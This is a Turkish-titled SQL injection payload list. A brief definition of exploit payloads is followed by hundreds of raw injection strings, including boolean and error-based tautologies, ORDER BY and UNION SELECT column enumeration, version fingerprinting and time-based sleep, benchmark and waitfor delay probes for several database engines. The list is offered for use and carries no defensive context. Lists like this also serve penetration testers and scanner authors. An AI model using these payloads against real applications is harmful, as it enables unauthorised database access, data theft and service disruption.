SQL İNJECTİON PAYLOAD LİSTESİ

Payload nedir?
Hedef sisteme exploit doğru bir şekilde uygulandıktan sonra hedefe yollanıp çalıştırılaması istenen modüle verilen addır.
Bu modül aracılığı ile karşı taraf ile bağlantımız sağlanmış olup girmemiz gereken komutları bizden bekler ve kendisi aracılığı ile açmış olduğumuz servise gönderir ve karşı tarafta çalışmasını sağlar.

Genel SQL Injection Payloads

'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/ 
+		addition, concatenate (or space in url)
||		(double pipe) concatenate
%		wildcard attribute indicator

@variable	local variable
@@variable	global variable


# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2


1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1	

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

#	    Hash comment
/*  	C-style comment
-- -	SQL comment
;%00	Nullbyte
`	    Backtick

Genel Error Based Payloads

 OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1-- 
 OR 1=0-- 
 OR x=x-- 
 OR x=y-- 
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14# 
 ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23# 
 ORDER BY 24# 
 ORDER BY 25# 
 ORDER BY 26# 
 ORDER BY 27# 
 ORDER BY 28# 
 ORDER BY 29# 
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1 
 ORDER BY 2 
 ORDER BY 3 
 ORDER BY 4 
 ORDER BY 5 
 ORDER BY 6 
 ORDER BY 7 
 ORDER BY 8 
 ORDER BY 9 
 ORDER BY 10 
 ORDER BY 11 
 ORDER BY 12 
 ORDER BY 13 
 ORDER BY 14 
 ORDER BY 15 
 ORDER BY 16 
 ORDER BY 17 
 ORDER BY 18 
 ORDER BY 19 
 ORDER BY 20 
 ORDER BY 21 
 ORDER BY 22 
 ORDER BY 23 
 ORDER BY 24 
 ORDER BY 25 
 ORDER BY 26 
 ORDER BY 27 
 ORDER BY 28 
 ORDER BY 29 
 ORDER BY 30 
 ORDER BY 31337 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'

Genel Time Based SQL Injection Payloads

# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

Genel Union Select Payloads

 ORDER BY SLEEP(5)
 ORDER BY 1,SLEEP(5)
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 ORDER BY SLEEP(5)#
 ORDER BY 1,SLEEP(5)#
 ORDER BY 1,SLEEP(5),3#
 ORDER BY 1,SLEEP(5),3,4#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 ORDER BY SLEEP(5)-- 
 ORDER BY 1,SLEEP(5)-- 
 ORDER BY 1,SLEEP(5),3-- 
 ORDER BY 1,SLEEP(5),3,4-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 1
 UNION ALL SELECT 1,2
 UNION ALL SELECT 1,2,3
 UNION ALL SELECT 1,2,3,4
 UNION ALL SELECT 1,2,3,4,5
 UNION ALL SELECT 1,2,3,4,5,6
 UNION ALL SELECT 1,2,3,4,5,6,7
 UNION ALL SELECT 1,2,3,4,5,6,7,8
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 1#
 UNION ALL SELECT 1,2#
 UNION ALL SELECT 1,2,3#
 UNION ALL SELECT 1,2,3,4#
 UNION ALL SELECT 1,2,3,4,5#
 UNION ALL SELECT 1,2,3,4,5,6#
 UNION ALL SELECT 1,2,3,4,5,6,7#
 UNION ALL SELECT 1,2,3,4,5,6,7,8#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT 1-- 
 UNION ALL SELECT 1,2-- 
 UNION ALL SELECT 1,2,3-- 
 UNION ALL SELECT 1,2,3,4-- 
 UNION ALL SELECT 1,2,3,4,5-- 
 UNION ALL SELECT 1,2,3,4,5,6-- 
 UNION ALL SELECT 1,2,3,4,5,6,7-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION SELECT @@VERSION,SLEEP(5),3
 UNION SELECT @@VERSION,SLEEP(5),USER(),4
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
